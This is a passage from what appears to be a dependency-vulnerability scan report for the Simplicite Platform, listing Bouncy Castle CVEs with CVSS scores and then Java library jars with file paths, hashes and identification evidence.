Bouncy Castle BC Java before 1.66, BC C# .NET before 1.8.7, BC-FJA before 1.0.1.2, 1.0.2.1, and BC-FNA before 1.0.1.1 have a timing issue within the EC math library that can expose information about the private key when an attacker is able to observe timing information for the generation of multiple deterministic ECDSA signatures. CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2020-0187 (OSSINDEX)
In engineSetMode of BaseBlockCipher.java, there is a possible incorrect cryptographic algorithm chosen due to an incomplete comparison. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-148517383. CWE-310 Cryptographic Issues
CVSSv2:
Base Score: MEDIUM (5.5) Vector: /AV:L/AC:L/Au:/C:H/I:N/A:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.bouncycastle:bcprov-jdk15on:1.63:*:*:*:*:*:*:*
CVE-2023-33201 (OSSINDEX)
Bouncy Castle For Java before 1.74 is affected by an LDAP injection vulnerability. The vulnerability only affects applications that use an LDAP CertStore from Bouncy Castle to validate X.509 certificates. During the certificate validation process, Bouncy Castle inserts the certificate's Subject Name into an LDAP search filter without any escaping, which leads to an LDAP injection vulnerability.
CWE-295 Improper Certificate Validation
CVSSv2: Base Score: MEDIUM (5.3) Vector: /AV:N/AC:L/Au:/C:L/I:N/A:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.bouncycastle:bcprov-jdk15on:1.63:*:*:*:*:*:*:*
boilerpipe-1.1.0.jar
Description:
The boilerpipe library provides algorithms to detect and remove the surplus "clutter" (boilerplate, templates) around the main textual content of a web page.
The library already provides specific strategies for common tasks (for example: news article extraction) and may also be easily extended for individual problem settings.
Extracting content is very fast (milliseconds), just needs the input document (no global or site-level information required) and is usually quite accurate.
Boilerpipe is a Java library written by Christian Kohlschütter. It is released under the Apache License 2.0.
The algorithms used by the library are based on (and extending) some concepts of the paper "Boilerplate Detection using Shallow Text Features" by Christian Kohlschütter et al., presented at WSDM 2010 -- The Third ACM International Conference on Web Search and Data Mining New York City, NY USA.
License: Apache License 2.0
File Path: /var/simplicite/.m2/repository/de/l3s/boilerpipe/boilerpipe/1.1.0/boilerpipe-1.1.0.jar
MD5: 0616568083786d0f49e2cb07a5d09fe4
SHA1: f62cb75ed52455a9e68d1d05b84c500673340eb2
SHA256: 088203df4326c4dcc42cec1253a2b41e03dc8904984eae744543b48e2cc63846
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name boilerpipe High Vendor jar package name boilerpipe Highest Vendor jar package name boilerpipe Low Vendor jar package name de Highest Vendor jar package name de Low Vendor jar package name document Highest Vendor jar package name html Highest Vendor jar package name l3s Highest Vendor jar package name l3s Low Vendor pom artifactid boilerpipe Highest Vendor pom artifactid boilerpipe Low Vendor pom developer name Christian Kohlschütter Medium Vendor pom groupid de.l3s.boilerpipe Highest Vendor pom name Boilerpipe -- Boilerplate Removal and Fulltext Extraction from HTML pages High Vendor pom url http://code.google.com/p/boilerpipe/ Highest Product file name boilerpipe High Product jar package name boilerpipe Highest Product jar package name boilerpipe Low Product jar package name de Highest Product jar package name document Highest Product jar package name html Highest Product jar package name l3s Highest Product jar package name l3s Low Product pom artifactid boilerpipe Highest Product pom developer name Christian Kohlschütter Low Product pom groupid de.l3s.boilerpipe Highest Product pom name Boilerpipe -- Boilerplate Removal and Fulltext Extraction from HTML pages High Product pom url http://code.google.com/p/boilerpipe/ Medium Version file version 1.1.0 High Version pom version 1.1.0 Highest
bson-3.11.0.jar
Description: The BSON library
License: The Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/mongodb/bson/3.11.0/bson-3.11.0.jar
MD5: fee103bbdf1b62541826f1fff8c75166
SHA1: 5f00c5a8f05b66a33239efd1131aaef5a49ba5b8
SHA256: 87015c5e3d35ae0e1593a89adacaa744c265ba617a4e045252a0e67855998c4d
Referenced In Project/Scope: Simplicite Platform:runtime
Evidence Type Source Name Value Confidence Vendor file name bson High Vendor jar package name bson Highest Vendor Manifest automatic-module-name org.mongodb.bson Medium Vendor Manifest bundle-symbolicname org.mongodb.bson Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor pom artifactid bson Highest Vendor pom artifactid bson Low Vendor pom developer name Various Medium Vendor pom developer org MongoDB Medium Vendor pom groupid org.mongodb Highest Vendor pom name BSON High Vendor pom url https://bsonspec.org Highest Product file name bson High Product jar package name bson Highest Product Manifest automatic-module-name org.mongodb.bson Medium Product Manifest Bundle-Name bson Medium Product Manifest bundle-symbolicname org.mongodb.bson Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product pom artifactid bson Highest Product pom developer name Various Low Product pom developer org MongoDB Low Product pom groupid org.mongodb Highest Product pom name BSON High Product pom url https://bsonspec.org Medium Version file version 3.11.0 High Version Manifest build-version 3.11.0 Medium Version Manifest Bundle-Version 3.11.0 High Version pom version 3.11.0 Highest
bzip2-0.9.1.jar
Description: jbzip2 is a Java bzip2 compression/decompression library. It can be used as a replacement for the Apache CBZip2InputStream / CBZip2OutputStream classes.
License: MIT License (MIT): http://opensource.org/licenses/mit-license.php
File Path: /var/simplicite/.m2/repository/org/itadaki/bzip2/0.9.1/bzip2-0.9.1.jar
MD5: ddd5eb3a035655cbbb536e9b86907a00
SHA1: 47ca95f71e3ccae756c4a24354d48069c58f475c
SHA256: 865a7a13dd33ef0388f675993adaf4c6f95632ba80d609d42e9d42e6343aae77
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name bzip2 High Vendor jar package name bzip2 Highest Vendor jar package name bzip2 Low Vendor jar package name itadaki Highest Vendor jar package name itadaki Low Vendor pom artifactid bzip2 Highest Vendor pom artifactid bzip2 Low Vendor pom groupid org.itadaki Highest Vendor pom name Itadaki jbzip2 High Vendor pom url https://code.google.com/p/jbzip2/ Highest Product file name bzip2 High Product jar package name bzip2 Highest Product jar package name bzip2 Low Product jar package name itadaki Highest Product pom artifactid bzip2 Highest Product pom groupid org.itadaki Highest Product pom name Itadaki jbzip2 High Product pom url https://code.google.com/p/jbzip2/ Medium Version file version 0.9.1 High Version pom version 0.9.1 Highest
c3p0-0.9.5.4.jar
Description: a JDBC Connection pooling / Statement caching library
License:
GNU Lesser General Public License, Version 2.1: http://www.gnu.org/licenses/lgpl-2.1.html
Eclipse Public License, Version 1.0: http://www.eclipse.org/org/documents/epl-v10.php
File Path: /var/simplicite/.m2/repository/com/mchange/c3p0/0.9.5.4/c3p0-0.9.5.4.jar
MD5: 45fd4a89c9fd671a0d1dc97c0ec77abe
SHA1: a21a1d37ae0b59efce99671544f51c34ed1e8def
SHA256: 60cf2906cd6ad6771f514a3e848b74b3e3da99c1806f2a63c38e2dd8da5ef11f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name c3p0 High Vendor jar package name c3p0 Highest Vendor jar package name mchange Highest Vendor jar package name v2 Highest Vendor Manifest extension-name com.mchange.v2.c3p0 Medium Vendor Manifest Implementation-Vendor Machinery For Change, Inc. High Vendor Manifest Implementation-Vendor-Id com.mchange Medium Vendor Manifest specification-vendor Machinery For Change, Inc. Low Vendor pom artifactid c3p0 Highest Vendor pom artifactid c3p0 Low Vendor pom developer email swaldman@mchange.com Low Vendor pom developer id swaldman Medium Vendor pom developer name Steve Waldman Medium Vendor pom groupid com.mchange Highest Vendor pom name c3p0 High Vendor pom url swaldman/c3p0 Highest Product file name c3p0 High Product jar package name c3p0 Highest Product jar package name mchange Highest Product jar package name v2 Highest Product Manifest extension-name com.mchange.v2.c3p0 Medium Product pom artifactid c3p0 Highest Product pom developer email swaldman@mchange.com Low Product pom developer id swaldman Low Product pom developer name Steve Waldman Low Product pom groupid com.mchange Highest Product pom name c3p0 High Product pom url swaldman/c3p0 High Version file version 0.9.5.4 High Version Manifest Implementation-Version 0.9.5.4 High Version pom version 0.9.5.4 Highest
cdm-4.5.5.jar
Description: The NetCDF-Java Library is a Java interface to NetCDF files, as well as to many other types of scientific data formats.
File Path: /var/simplicite/.m2/repository/edu/ucar/cdm/4.5.5/cdm-4.5.5.jar
MD5: 7770c86aabbd0ec5e12ed1f0600d5492
SHA1: af1748a3d024069cb7fd3fc2591efe806c914589
SHA256: 74ea183cda0f7aa06fae2f3cfa8c3c6c64d013ce8cb87bde4a06de6676eacfdb
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name cdm High Vendor jar package name cdm Highest Vendor jar package name thredds Highest Vendor jar package name ucar Highest Vendor jar package name unidata Highest Vendor Manifest built-on 20150306.1537 Low Vendor Manifest Implementation-Vendor UCAR/Unidata High Vendor Manifest Implementation-Vendor-Id edu.ucar Medium Vendor pom artifactid cdm Highest Vendor pom artifactid cdm Low Vendor pom groupid edu.ucar Highest Vendor pom name CDM core library High Vendor pom parent-artifactid thredds-parent Low Vendor pom url http://www.unidata.ucar.edu/software/netcdf-java/documentation.htm Highest Product file name cdm High Product jar package name cdm Highest Product jar package name thredds Highest Product jar package name ucar Highest Product Manifest built-on 20150306.1537 Low Product Manifest Implementation-Title CDM core library High Product pom artifactid cdm Highest Product pom groupid edu.ucar Highest Product pom name CDM core library High Product pom parent-artifactid thredds-parent Medium Product pom url http://www.unidata.ucar.edu/software/netcdf-java/documentation.htm Medium Version file version 4.5.5 High Version Manifest Implementation-Version 4.5.5 High Version pom version 4.5.5 Highest
checker-qual-2.11.0.jar
Description: Checker Qual is the set of annotations (qualifiers) and supporting classes used by the Checker Framework to type check Java source code. Please see artifact: org.checkerframework:checker
License: The MIT License: http://opensource.org/licenses/MIT
File Path: /var/simplicite/.m2/repository/org/checkerframework/checker-qual/2.11.0/checker-qual-2.11.0.jar
MD5: 33a7c3e20614e973a80aa284e3782156
SHA1: 7de2908ee759b650dcddfd9913698e472cbe7272
SHA256: 493ccb75b28a164c7dbe066bcfef0fd4091fdc1d384cef664ae9555ff397cd83
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name checker-qual High Vendor jar package name checker Highest Vendor jar package name checkerframework Highest Vendor jar package name framework Highest Vendor jar package name qual Highest Vendor Manifest automatic-module-name org.checkerframework.checker.qual Medium Vendor Manifest bundle-symbolicname checker-qual Medium Vendor Manifest implementation-url https://checkerframework.org Low Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor pom artifactid checker-qual Highest Vendor pom artifactid checker-qual Low Vendor pom developer email mernst@cs.washington.edu Low Vendor pom developer email smillst@cs.washington.edu Low Vendor pom developer email wdietl@uwaterloo.ca Low Vendor pom developer id mernst Medium Vendor pom developer id smillst Medium Vendor pom developer id wmdietl Medium Vendor pom developer name Michael Ernst Medium Vendor pom developer name Suzanne Millstein Medium Vendor pom developer name Werner M. Dietl Medium Vendor pom developer org University of Washington Medium Vendor pom developer org University of Washington PLSE Group Medium Vendor pom developer org University of Waterloo Medium Vendor pom developer org URL http://uwaterloo.ca/ Medium Vendor pom developer org URL https://www.cs.washington.edu/ Medium Vendor pom developer org URL https://www.cs.washington.edu/research/plse/ Medium Vendor pom groupid org.checkerframework Highest Vendor pom name Checker Qual High Vendor pom url https://checkerframework.org Highest Product file name checker-qual High Product jar package name checker Highest Product jar package name checkerframework Highest Product jar package name framework Highest Product jar package name qual Highest Product Manifest automatic-module-name org.checkerframework.checker.qual Medium Product Manifest Bundle-Name checker-qual Medium Product Manifest bundle-symbolicname checker-qual Medium Product Manifest implementation-url https://checkerframework.org Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product pom artifactid checker-qual Highest Product pom developer email mernst@cs.washington.edu Low Product pom developer email smillst@cs.washington.edu Low Product pom developer email wdietl@uwaterloo.ca Low Product pom developer id mernst Low Product pom developer id smillst Low Product pom developer id wmdietl Low Product pom developer name Michael Ernst Low Product pom developer name Suzanne Millstein Low Product pom developer name Werner M. Dietl Low Product pom developer org University of Washington Low Product pom developer org University of Washington PLSE Group Low Product pom developer org University of Waterloo Low Product pom developer org URL http://uwaterloo.ca/ Low Product pom developer org URL https://www.cs.washington.edu/ Low Product pom developer org URL https://www.cs.washington.edu/research/plse/ Low Product pom groupid org.checkerframework Highest Product pom name Checker Qual High Product pom url https://checkerframework.org Medium Version file version 2.11.0 High Version Manifest Bundle-Version 2.11.0 High Version Manifest Implementation-Version 2.11.0 High Version pom version 2.11.0 Highest
codemodel-2.3.2.jar
Description: The core functionality of the CodeModel java source code generation library
File Path: /var/simplicite/.m2/repository/org/glassfish/jaxb/codemodel/2.3.2/codemodel-2.3.2.jar
MD5: 8651b4954656d27a3408ffc38f041060
SHA1: 143b70e564189b3f71a2e7f02d6bb8c6b16b5632
SHA256: 8a89a76dffb491a3b2bcfcb6e8d9fb2e30ec0c36629a033f90c93182799af773
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name codemodel High Vendor jar package name codemodel Highest Vendor jar package name codemodel Low Vendor jar package name sun Highest Vendor jar package name sun Low Vendor jar (hint) package name oracle Highest Vendor jar (hint) package name oracle Low Vendor pom artifactid codemodel Highest Vendor pom artifactid codemodel Low Vendor pom groupid org.glassfish.jaxb Highest Vendor pom name Codemodel Core High Vendor pom parent-artifactid jaxb-codemodel-parent Low Vendor pom parent-groupid com.sun.xml.bind.mvn Medium Product file name codemodel High Product jar package name codemodel Highest Product jar package name codemodel Low Product jar package name sun Highest Product pom artifactid codemodel Highest Product pom groupid org.glassfish.jaxb Highest Product pom name Codemodel Core High Product pom parent-artifactid jaxb-codemodel-parent Medium Product pom parent-groupid com.sun.xml.bind.mvn Medium Version file version 2.3.2 High Version pom version 2.3.2 Highest
commonmark-0.13.0.jar
Description: Core of commonmark-java (implementation of CommonMark for parsing markdown and rendering to HTML)
File Path: /var/simplicite/.m2/repository/com/atlassian/commonmark/commonmark/0.13.0/commonmark-0.13.0.jar
MD5: 535b94d32fa44874a37824586ab5906b
SHA1: d233ad1436f35c7f88e3488ce6c1e65425c1a059
SHA256: fd38aecef680649894ffd7b434e10081fc609e260c63e16c4323a3eaa2a9f096
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commonmark High Vendor jar package name commonmark Highest Vendor jar package name html Highest Vendor jar package name parsing Highest Vendor Manifest automatic-module-name org.commonmark Medium Vendor pom artifactid commonmark Highest Vendor pom artifactid commonmark Low Vendor pom groupid com.atlassian.commonmark Highest Vendor pom name commonmark-java core High Vendor pom parent-artifactid commonmark-parent Low Product file name commonmark High Product jar package name commonmark Highest Product jar package name html Highest Product jar package name parsing Highest Product Manifest automatic-module-name org.commonmark Medium Product pom artifactid commonmark Highest Product pom groupid com.atlassian.commonmark Highest Product pom name commonmark-java core High Product pom parent-artifactid commonmark-parent Medium Version file version 0.13.0 High Version pom version 0.13.0 Highest
commonmark-ext-autolink-0.13.0.jar
Description: commonmark-java extension for turning plain URLs and email addresses into links
File Path: /var/simplicite/.m2/repository/com/atlassian/commonmark/commonmark-ext-autolink/0.13.0/commonmark-ext-autolink-0.13.0.jar
MD5: 3dc8ecec8ae20ad6211002d9d39ce47a
SHA1: 06c68a2bea2d1643024ab2533350f3317e46a066
SHA256: 610a086274e7ccc9611d99de91d7a4c8ee9a429ede65eb2afd7691882f837bd5
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commonmark-ext-autolink High Vendor jar package name autolink Highest Vendor jar package name commonmark Highest Vendor jar package name ext Highest Vendor Manifest automatic-module-name org.commonmark.ext.autolink Medium Vendor pom artifactid commonmark-ext-autolink Highest Vendor pom artifactid commonmark-ext-autolink Low Vendor pom groupid com.atlassian.commonmark Highest Vendor pom name commonmark-java extension for autolinking High Vendor pom parent-artifactid commonmark-parent Low Product file name commonmark-ext-autolink High Product jar package name autolink Highest Product jar package name commonmark Highest Product jar package name ext Highest Product Manifest automatic-module-name org.commonmark.ext.autolink Medium Product pom artifactid commonmark-ext-autolink Highest Product pom groupid com.atlassian.commonmark Highest Product pom name commonmark-java extension for autolinking High Product pom parent-artifactid commonmark-parent Medium Version file version 0.13.0 High Version pom version 0.13.0 Highest
commonmark-ext-gfm-strikethrough-0.13.0.jar
Description: commonmark-java extension for GFM strikethrough using ~~ (GitHub Flavored Markdown)
File Path: /var/simplicite/.m2/repository/com/atlassian/commonmark/commonmark-ext-gfm-strikethrough/0.13.0/commonmark-ext-gfm-strikethrough-0.13.0.jar
MD5: 40a9c6854bf27aa785c979ada9ebac9c
SHA1: 60c7582b118a9c47e859544df04da88cf1282eaf
SHA256: 5f3ad6d147eeab88f99b4f0f7be42969e1e876d4d3b851abd57a71b4af80ea6f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commonmark-ext-gfm-strikethrough High Vendor jar package name commonmark Highest Vendor jar package name ext Highest Vendor jar package name gfm Highest Vendor jar package name strikethrough Highest Vendor Manifest automatic-module-name org.commonmark.ext.gfm.strikethrough Medium Vendor pom artifactid commonmark-ext-gfm-strikethrough Highest Vendor pom artifactid commonmark-ext-gfm-strikethrough Low Vendor pom groupid com.atlassian.commonmark Highest Vendor pom name commonmark-java extension for strikethrough High Vendor pom parent-artifactid commonmark-parent Low Product file name commonmark-ext-gfm-strikethrough High Product jar package name commonmark Highest Product jar package name ext Highest Product jar package name gfm Highest Product jar package name strikethrough Highest Product Manifest automatic-module-name org.commonmark.ext.gfm.strikethrough Medium Product pom artifactid commonmark-ext-gfm-strikethrough Highest Product pom groupid com.atlassian.commonmark Highest Product pom name commonmark-java extension for strikethrough High Product pom parent-artifactid commonmark-parent Medium Version file version 0.13.0 High Version pom version 0.13.0 Highest
commonmark-ext-gfm-tables-0.13.0.jar
Description: commonmark-java extension for GFM tables using "|" pipes (GitHub Flavored Markdown)
File Path: /var/simplicite/.m2/repository/com/atlassian/commonmark/commonmark-ext-gfm-tables/0.13.0/commonmark-ext-gfm-tables-0.13.0.jar
MD5: 7e660c78c296f6ae4aa1382193e83d80
SHA1: c3a5ba4217cacc7833c697e5081da42ae996655f
SHA256: b4709a5149cd3cbfb9762216955ba0576abc88b52973b30dd6f697a7a6290d15
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commonmark-ext-gfm-tables High Vendor jar package name commonmark Highest Vendor jar package name ext Highest Vendor jar package name gfm Highest Vendor jar package name tables Highest Vendor Manifest automatic-module-name org.commonmark.ext.gfm.tables Medium Vendor pom artifactid commonmark-ext-gfm-tables Highest Vendor pom artifactid commonmark-ext-gfm-tables Low Vendor pom groupid com.atlassian.commonmark Highest Vendor pom name commonmark-java extension for tables High Vendor pom parent-artifactid commonmark-parent Low Product file name commonmark-ext-gfm-tables High Product jar package name commonmark Highest Product jar package name ext Highest Product jar package name gfm Highest Product jar package name tables Highest Product Manifest automatic-module-name org.commonmark.ext.gfm.tables Medium Product pom artifactid commonmark-ext-gfm-tables Highest Product pom groupid com.atlassian.commonmark Highest Product pom name commonmark-java extension for tables High Product pom parent-artifactid commonmark-parent Medium Version file version 0.13.0 High Version pom version 0.13.0 Highest
commonmark-ext-heading-anchor-0.13.0.jar
Description: commonmark-java extension for adding unique id attributes to header tags
File Path: /var/simplicite/.m2/repository/com/atlassian/commonmark/commonmark-ext-heading-anchor/0.13.0/commonmark-ext-heading-anchor-0.13.0.jar
MD5: 6cad26a7747122569d835428b7486df3
SHA1: 37d5856e790aeb5244fe931111d9ab7e13955d51
SHA256: c1fbe40469f494c6f31f7870ea69f8db60d854b6c12bb0e2b615e08a55901c46
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commonmark-ext-heading-anchor High Vendor jar package name anchor Highest Vendor jar package name commonmark Highest Vendor jar package name ext Highest Vendor jar package name heading Highest Vendor Manifest automatic-module-name org.commonmark.ext.heading.anchor Medium Vendor pom artifactid commonmark-ext-heading-anchor Highest Vendor pom artifactid commonmark-ext-heading-anchor Low Vendor pom groupid com.atlassian.commonmark Highest Vendor pom name commonmark-java extension for adding id attributes to h tags High Vendor pom parent-artifactid commonmark-parent Low Product file name commonmark-ext-heading-anchor High Product jar package name anchor Highest Product jar package name commonmark Highest Product jar package name ext Highest Product jar package name heading Highest Product Manifest automatic-module-name org.commonmark.ext.heading.anchor Medium Product pom artifactid commonmark-ext-heading-anchor Highest Product pom groupid com.atlassian.commonmark Highest Product pom name commonmark-java extension for adding id attributes to h tags High Product pom parent-artifactid commonmark-parent Medium Version file version 0.13.0 High Version pom version 0.13.0 Highest
commonmark-ext-ins-0.13.0.jar
Description: commonmark-java extension for using ++
File Path: /var/simplicite/.m2/repository/com/atlassian/commonmark/commonmark-ext-ins/0.13.0/commonmark-ext-ins-0.13.0.jar
MD5: ded30f88bf404a24ba589e544eeaf378
SHA1: c61ce9b71905e0a83871511c9eeec2051212036e
SHA256: 5c65a7191a40d7cd3a49655e8534229b286b121169ff69ffbbace009ecd63965
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commonmark-ext-ins High Vendor jar package name commonmark Highest Vendor jar package name ext Highest Vendor jar package name ins Highest Vendor Manifest automatic-module-name org.commonmark.ext.ins Medium Vendor pom artifactid commonmark-ext-ins Highest Vendor pom artifactid commonmark-ext-ins Low Vendor pom groupid com.atlassian.commonmark Highest Vendor pom name commonmark-java extension for <ins> (underline) High Vendor pom parent-artifactid commonmark-parent Low Product file name commonmark-ext-ins High Product jar package name commonmark Highest Product jar package name ext Highest Product jar package name ins Highest Product Manifest automatic-module-name org.commonmark.ext.ins Medium Product pom artifactid commonmark-ext-ins Highest Product pom groupid com.atlassian.commonmark Highest Product pom name commonmark-java extension for <ins> (underline) High Product pom parent-artifactid commonmark-parent Medium Version file version 0.13.0 High Version pom version 0.13.0 Highest
commons-beanutils-1.9.4.jar
Description: Apache Commons BeanUtils provides an easy-to-use but flexible wrapper around reflection and introspection.
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/commons-beanutils/commons-beanutils/1.9.4/commons-beanutils-1.9.4.jar
MD5: 07dc532ee316fe1f2f0323e9bd2f8df4
SHA1: d52b9abcd97f38c81342bb7e7ae1eee9b73cba51
SHA256: 7d938c81789028045c08c065e94be75fc280527620d5bd62b519d5838532368a
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-beanutils High Vendor jar package name apache Highest Vendor jar package name beanutils Highest Vendor jar package name commons Highest Vendor Manifest bundle-docurl https://commons.apache.org/proper/commons-beanutils/ Low Vendor Manifest bundle-symbolicname org.apache.commons.commons-beanutils Medium Vendor Manifest implementation-build UNKNOWN_BRANCH@r??????; 2019-07-28 22:14:44+0000 Low Vendor Manifest implementation-url https://commons.apache.org/proper/commons-beanutils/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-beanutils Highest Vendor pom artifactid commons-beanutils Low Vendor pom developer email britter@apache.org Low Vendor pom developer email chtompki@apache.org Low Vendor pom developer email craigmcc@apache.org Low Vendor pom developer email dion@apache.org Low Vendor pom developer email epugh@apache.org Low Vendor pom developer email geirm@apache.org Low Vendor pom developer email ggregory@apache.org Low Vendor pom developer email jcarman@apache.org Low Vendor pom developer email jconlon@apache.org Low Vendor pom developer email jstrachan@apache.org Low Vendor pom developer email morgand@apache.org Low Vendor pom developer email mvdb@apache.org Low Vendor pom developer email niallp@apache.org Low Vendor pom developer email rdonkin@apache.org Low Vendor pom developer email rwaldhoff@apache.org Low Vendor pom developer email sanders@apache.org Low Vendor pom developer email scolebourne@apache.org Low Vendor pom developer email skitching@apache.org Low Vendor pom developer email stain@apache.org Low Vendor pom developer email tobrien@apache.org Low Vendor pom developer email yoavs@apache.org Low Vendor pom developer id britter Medium Vendor pom developer id chtompki Medium Vendor pom developer id craigmcc Medium Vendor pom developer id dion Medium Vendor pom developer id epugh Medium Vendor pom developer id geirm Medium Vendor pom developer id ggregory Medium Vendor pom developer id jcarman Medium Vendor pom developer id jconlon Medium Vendor pom developer id jstrachan Medium Vendor pom developer id morgand Medium Vendor pom developer id mvdb Medium Vendor pom developer id niallp Medium Vendor pom developer id rdonkin Medium Vendor pom developer id rwaldhoff Medium Vendor pom developer id sanders Medium Vendor pom developer id scolebourne Medium Vendor pom developer id skitching Medium Vendor pom developer id stain Medium Vendor pom developer id tobrien Medium Vendor pom developer id yoavs Medium Vendor pom developer name Benedikt Ritter Medium Vendor pom developer name Craig McClanahan Medium Vendor pom developer name David Eric Pugh Medium Vendor pom developer name Dion Gillard Medium Vendor pom developer name Gary Gregory Medium Vendor pom developer name Geir Magnusson Jr. Medium Vendor pom developer name James Carman Medium Vendor pom developer name James Strachan Medium Vendor pom developer name John E. Conlon Medium Vendor pom developer name Martin van den Bemt Medium Vendor pom developer name Morgan James Delagrange Medium Vendor pom developer name Niall Pemberton Medium Vendor pom developer name Rob Tompkins Medium Vendor pom developer name Robert Burrell Donkin Medium Vendor pom developer name Rodney Waldhoff Medium Vendor pom developer name Scott Sanders Medium Vendor pom developer name Simon Kitching Medium Vendor pom developer name Stephen Colebourne Medium Vendor pom developer name Stian Soiland-Reyes Medium Vendor pom developer name Tim O'Brien Medium Vendor pom developer name Yoav Shapira Medium Vendor pom developer org The Apache Software Foundation Medium Vendor pom groupid commons-beanutils Highest Vendor pom name Apache Commons BeanUtils High Vendor pom parent-artifactid commons-parent Low Vendor pom parent-groupid org.apache.commons Medium Vendor pom url https://commons.apache.org/proper/commons-beanutils/ Highest Product file name commons-beanutils High Product jar package name apache Highest Product jar package name beanutils Highest Product jar package name commons Highest Product Manifest bundle-docurl https://commons.apache.org/proper/commons-beanutils/ Low Product Manifest Bundle-Name Apache Commons BeanUtils Medium Product Manifest bundle-symbolicname org.apache.commons.commons-beanutils Medium Product Manifest implementation-build UNKNOWN_BRANCH@r??????; 2019-07-28 22:14:44+0000 Low Product Manifest Implementation-Title Apache Commons BeanUtils High Product Manifest implementation-url https://commons.apache.org/proper/commons-beanutils/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product Manifest specification-title Apache Commons BeanUtils Medium Product pom artifactid commons-beanutils Highest Product pom developer email britter@apache.org Low Product pom developer email chtompki@apache.org Low Product pom developer email craigmcc@apache.org Low Product pom developer email dion@apache.org Low Product pom developer email epugh@apache.org Low Product pom developer email geirm@apache.org Low Product pom developer email ggregory@apache.org Low Product pom developer email jcarman@apache.org Low Product pom developer email jconlon@apache.org Low Product pom developer email jstrachan@apache.org Low Product pom developer email morgand@apache.org Low Product pom developer email mvdb@apache.org Low Product pom developer email niallp@apache.org Low Product pom developer email rdonkin@apache.org Low Product pom developer email rwaldhoff@apache.org Low Product pom developer email sanders@apache.org Low Product pom developer email scolebourne@apache.org Low Product pom developer email skitching@apache.org Low Product pom developer email stain@apache.org Low Product pom developer email tobrien@apache.org Low Product pom developer email yoavs@apache.org Low Product pom developer id britter Low Product pom developer id chtompki Low Product pom developer id craigmcc Low Product pom developer id dion Low Product pom developer id epugh Low Product pom developer id geirm Low Product pom developer id ggregory Low Product pom developer id jcarman Low Product pom developer id jconlon Low Product pom developer id jstrachan Low Product pom developer id morgand Low Product pom developer id mvdb Low Product pom developer id niallp Low Product pom developer id rdonkin Low Product pom developer id rwaldhoff Low Product pom developer id sanders Low Product pom developer id scolebourne Low Product pom developer id skitching Low Product pom developer id stain Low Product pom developer id tobrien Low Product pom developer id yoavs Low Product pom developer name Benedikt Ritter Low Product pom developer name Craig McClanahan Low Product pom developer name David Eric Pugh Low Product pom developer name Dion Gillard Low Product pom developer name Gary Gregory Low Product pom developer name Geir Magnusson Jr. Low Product pom developer name James Carman Low Product pom developer name James Strachan Low Product pom developer name John E. Conlon Low Product pom developer name Martin van den Bemt Low Product pom developer name Morgan James Delagrange Low Product pom developer name Niall Pemberton Low Product pom developer name Rob Tompkins Low Product pom developer name Robert Burrell Donkin Low Product pom developer name Rodney Waldhoff Low Product pom developer name Scott Sanders Low Product pom developer name Simon Kitching Low Product pom developer name Stephen Colebourne Low Product pom developer name Stian Soiland-Reyes Low Product pom developer name Tim O'Brien Low Product pom developer name Yoav Shapira Low Product pom developer org The Apache Software Foundation Low Product pom groupid commons-beanutils Highest Product pom name Apache Commons BeanUtils High Product pom parent-artifactid commons-parent Medium Product pom parent-groupid org.apache.commons Medium Product pom url https://commons.apache.org/proper/commons-beanutils/ Medium Version file version 1.9.4 High Version Manifest Bundle-Version 1.9.4 High Version Manifest Implementation-Version 1.9.4 High Version pom parent-version 1.9.4 Low Version pom version 1.9.4 Highest
commons-cli-1.4.jar
Description: Apache Commons CLI provides a simple API for presenting, processing and validating a command line interface.
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/commons-cli/commons-cli/1.4/commons-cli-1.4.jar
MD5: c966d7e03507c834d5b09b848560174e
SHA1: c51c00206bb913cd8612b24abd9fa98ae89719b1
